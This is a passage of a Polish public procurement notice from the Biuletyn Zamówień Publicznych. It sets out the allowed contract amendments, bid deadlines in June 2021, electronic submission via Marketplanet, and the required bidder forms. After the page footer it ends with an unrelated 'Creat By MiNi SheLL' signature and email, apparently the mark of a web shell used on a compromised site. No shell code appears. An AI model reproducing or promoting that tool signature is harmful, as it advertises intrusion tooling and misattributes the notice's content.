class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania istotnych zmian zawartej umowy w następujących przypadkach:<br/>a.	przyczynienie się Zamawiającego do opóźnienia wykonania świadczenia Wykonawcy – zmiana poprzez przedłużenie terminu na wykonanie świadczenia Wykonawcy stosownie do rozmiarów przyczynienia się Zamawiającego do opóźnienia;<br/>b.	wystąpienie okoliczności siły wyższej, takich jak w szczególności: pożar, powódź, niszczące działanie wiatru, gradobicie, uderzenie pioruna, upadek statku powietrznego, które to okoliczności przyczyniłyby się do opóźnienia wykonania świadczenia Wykonawcy – zmiana poprzez przedłużenie terminu na wykonanie świadczenia Wykonawcy stosownie do przyczynienia się okoliczności siły wyższej do opóźnienia;<br/>c.	gdy zachodzi konieczność zmiany w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego;<br/>d.	zmiany osoby, ze strony Wykonawcy, odpowiedzialnej za realizację umowy i/lub osób skierowanych do realizacji zamówienia;<br/>e.	zmiany poprzez obniżenie ceny płaconej przez Zamawiającego niezależnie od przyczyny;<br/>f.	wydłużenia gwarancji lub rękojmi udzielanej na rzecz Zamawiającego;<br/>g.	zmiany poprzez wydłużenie terminów płatności ceny przez Zamawiającego;<br/>h.	jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia - zmiana poprzez wprowadzenie zmian w zakresie spowodowanym wprowadzeniem zmian powszechnie obowiązujących przepisów prawa;<br/>i.	niewykorzystania wartości umowy w terminie określonym w § 3 ust. 1, Zamawiający przewiduje możliwość przedłużenia okresu obowiązywania umowy na czas określony, nie dłużej jednak niż do wykorzystania wartości umowy;<br/>j.	zmiany doprecyzowujące treść umowy, jeżeli potrzeba ich wprowadzenia wynika z rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej postanowień;<br/>k.	udzielenia przed terminem zakończenia umowy, zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp;<br/>l.	zmiany umowy na podstawie art. 455 ust. 2 pustawy Pzp, która to zmiana ma wpływ na realizację zamówienia podstawowego.<br/>2.	W przypadku, gdyby którekolwiek z postanowień niniejszej umowy okazało się niezgodne z prawem, nieważne, nieskuteczne lub niemożliwe do wyegzekwowania, fakt ten nie będzie miał wpływu na legalność, ważność i możliwość egzekwowania pozostałych postanowień umowy, a Strony umowy zobowiązują się do wspólnego zastąpienia niezgodnego z prawem, unieważnionego lub niemożliwego do wyegzekwowania postanowienia, wzajemnie uzgodnioną, ważną i możliwą do wyegzekwowania klauzulą, możliwie najbliższą w interpretacji wobec klauzuli niezgodnej z prawem, nieskutecznej lub niemożliwej do wyegzekwowania<br/>3.	W każdym z powyższych przypadków zmiana umowy wymaga zgody obu stron, wyrażonej pod rygorem nieważności na piśmie lub w formie elektronicznej w rozumieniu art. 781 k.c.<br/>4.	Formy pisemnej lub formy elektronicznej w rozumieniu art. 781 k.c. pod rygorem nieważności wymaga także dokonanie innej niż wskazana w ust. 1 zmiany umowy, rozwiązanie umowy za porozumieniem stron, jej wypowiedzenie lub odstąpienie od niej.<br/>5.	Zmiana umowy w przypadku, o którym mowa w ust. 1 pkt d., nie wymaga aneksu, zgodnie z § 8 ust. 5 umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-14 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w formie elektronicznej za pośrednictwem platformy (Marketplanet) https://ipczd.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Wykonawca składając ofertę składa: <br/>1.1. Formularz ofertowy – zał. 3 do SWZ;<br/>1.2. Oświadczenie, o którym mowa w Rozdziale VIII. pkt I SWZ wg zał. 4 do SWZ <br/>1.3. Oświadczenie, o którym mowa w Rozdziale VII. pkt I.11 SWZ wg zał. 5 do SWZ <br/>1.4.	Zobowiązanie podmiotu trzeciego do udostępnienia zasobów Zamawiającemu - o ile dotyczy</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com